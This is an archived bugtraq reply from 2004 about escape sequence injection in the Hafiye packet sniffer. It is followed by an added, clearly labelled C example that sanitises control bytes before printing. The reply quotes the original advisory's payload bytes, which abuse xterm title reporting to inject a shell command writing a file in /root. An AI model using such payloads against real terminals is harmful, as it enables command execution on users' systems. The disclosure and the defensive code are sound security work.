[36244] in bugtraq
Re: Hafiye-1.0 Terminal Escape Sequence Injection Vulnerability
daemon@ATHENA.MIT.EDU (Jan Minar)
Tue Aug 24 14:19:41 2004
Date: Tue, 24 Aug 2004 04:33:57 +0200
From: Jan Minar <jjminar@fastmail.fm>
To: bugtraq@securityfocus.com
Message-ID: <20040824023357.GA10936@kontryhel.haltyr.dyndns.org>
Mail-Followup-To: bugtraq@securityfocus.com
In-Reply-To: <412A382F.6060204@gmx.net>
On Mon, Aug 23, 2004 at 09:32:15PM +0300, Serkan Akpolat wrote:
> If Hafiye has been started with -n packet count option,
> the vulnerability could allow remote code execution.
> For remote code execution the victim must press Enter after program exit.
> "\x1b""]2;Insecure?""\x07\x0a",
> "\x07\x07\x07\x07\x07\x07",
> "\x1b""]2;;echo Owned > /root/Owned.txt"
> "\x07\x1b""[21t""\x1b""]2;xterm""\x07"
> "Abnormal Termination""\x1b"
> "[8m;""\x0a"};
That is, with broken terminals/emulators, such as rxvt in Debian
Woody (at the time of my writing this). These devices/programs should
have been fixed a long time ago in the first place. (Not that (albeit
crippled) echo-back escape sequences were a good idea anyway.)
Jan.
-- 
"To me, clowns aren't funny. In fact, they're kind of scary. I've wondered
where this started and I think it goes back to the time I went to the circus,
and a clown killed my dad."
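Added example, not part of the original post and not Hafiye's code: the thread places the fix in the terminal, but a program that prints captured packet data can also neutralise control bytes before they reach the terminal. The C function below (the name sanitize_for_tty and the sample bytes are constructed for illustration) rewrites every non-printable byte, including ESC, BEL and the 8-bit C1 range, as visible \xNN text.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: copy n untrusted bytes from in to out, replacing
 * every byte a terminal might interpret with a literal "\xNN".
 * Escaped: C0 controls (0x00-0x1f, so ESC and BEL), DEL, all bytes
 * >= 0x80 (covers 8-bit C1 controls such as CSI 0x9b and OSC 0x9d),
 * and backslash itself so the output stays unambiguous.
 * Returns the output length, or (size_t)-1 if out is too small. */
size_t sanitize_for_tty(const unsigned char *in, size_t n,
                        char *out, size_t outsz)
{
    static const char hex[] = "0123456789abcdef";
    size_t o = 0;

    for (size_t i = 0; i < n; i++) {
        unsigned char c = in[i];
        int safe = (c >= 0x20 && c <= 0x7e && c != '\\');
        size_t need = safe ? 1 : 4;

        if (o + need + 1 > outsz)      /* always keep room for the NUL */
            return (size_t)-1;
        if (safe) {
            out[o++] = (char)c;
        } else {
            out[o++] = '\\';
            out[o++] = 'x';
            out[o++] = hex[c >> 4];
            out[o++] = hex[c & 0x0f];
        }
    }
    if (o + 1 > outsz)                 /* n == 0 with a zero-size buffer */
        return (size_t)-1;
    out[o] = '\0';
    return o;
}

int main(void)
{
    /* Constructed sample payload: a title-set sequence plus a C1 CSI byte. */
    static const unsigned char pkt[] = "id=\x1b]2;demo\x07\x9b" "8m\n";
    char line[4 * sizeof pkt + 1];

    if (sanitize_for_tty(pkt, sizeof pkt - 1, line, sizeof line) != (size_t)-1)
        puts(line);                    /* only inert, printable text is emitted */
    return 0;
}
```
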